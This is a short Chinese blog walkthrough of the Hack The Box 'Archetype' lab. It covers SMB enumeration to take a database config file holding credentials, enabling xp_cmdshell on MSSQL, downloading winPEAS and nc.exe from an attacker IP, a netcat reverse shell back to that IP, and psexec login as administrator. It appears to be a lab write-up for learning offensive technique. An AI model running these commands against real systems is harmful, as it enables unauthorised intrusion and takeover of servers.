HTB- Archetype

Cohawa·2023-08-11 01:03·52 次阅读

HTB- Archetype

端口扫描

Copy
nmap -sV -sT 10.129.1.1

image

smbclint

Copy
smbclient -L 10.129.149.214

image

获取密码

Copy
smbclient //10.129.149.214/backups
get prod.dtsConfig

image

连接数据库

Copy
sudo impacket-mssqlclient sql_svc@10.129.149.214 -windows-auth

image

开启xp_cmdshell#

Copy
enable_xp_cmdshell
RECONFIGURE

image

上传nc和提权工具

Copy
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.15.72/winPEAS.bat -outfile winPEAS.bat"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.15.72/nc.exe -outfile nc.exe"

image

开启nc监听 clinet运行nc

Copy
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;.\nc.exe -e cmd.exe 10.10.15.72 4444"

image

image

获取user flag

image

运行./winPEAS.bat

image

掉线后重新连接,查询历史记录(等待SQL显示output)

image

账号密码登录

Copy
sudo psexec.py administrator@10.129.149.214

image

读取root.txt

image

posted @   Cohawa  阅读(52)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· DeepSeek 开源周回顾「GitHub 热点速览」
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
点击右上角即可分享
微信分享提示
目录